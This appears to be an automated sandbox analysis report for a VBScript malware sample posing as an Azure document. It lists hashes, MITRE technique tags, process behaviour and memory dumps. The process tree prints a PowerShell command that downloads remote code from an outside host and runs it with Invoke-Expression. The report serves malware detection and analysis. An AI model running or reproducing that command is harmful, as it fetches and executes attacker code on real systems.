b3a8c88bdd9701a5ca532e0b433944e0992a3ae90e0bb974b2d091b2a01efb94

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
20-03-2024 01:17

Target

20032024_0917_AZURE_DOC_OPEN.vbs
Size

12KB
MD5

802e03ffd6498ec9693848197fe4d2e5
SHA1

958dfdadcd0f21d801561b94c23b8b3d6e5f4688
SHA256

b3a8c88bdd9701a5ca532e0b433944e0992a3ae90e0bb974b2d091b2a01efb94
SHA512

06d886eb039d120372a112c1f2c1a399d788800bd6ffc5892dd9e38f6ee4f8c7c2125e654248f2df24016276fedd52c6f7f30146d34a46ccb217b72abcbefb4a
SSDEEP

192:oMg119gkCtL3IqSPN3QzGNzUoNzhLnOdEpeLSHZgNdPR/Dnm9V4nN6UX:Ty19gR3IquNgzG2oNdOdEpeeqlPX

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2196	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 2196	1900	WScript.exe	28
PID 1900 wrote to memory of 2196	1900	WScript.exe	28
PID 1900 wrote to memory of 2196	1900	WScript.exe	28

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20032024_0917_AZURE_DOC_OPEN.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2196

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2196-4-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/2196-5-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/2196-7-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2196-8-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download
memory/2196-6-0x0000000002510000-0x0000000002518000-memory.dmp

Filesize
32KB

Download
memory/2196-9-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2196-10-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2196-11-0x0000000002980000-0x0000000002A00000-memory.dmp

Filesize
512KB

Download
memory/2196-12-0x000007FEF5B80000-0x000007FEF651D000-memory.dmp

Filesize
9.6MB

Download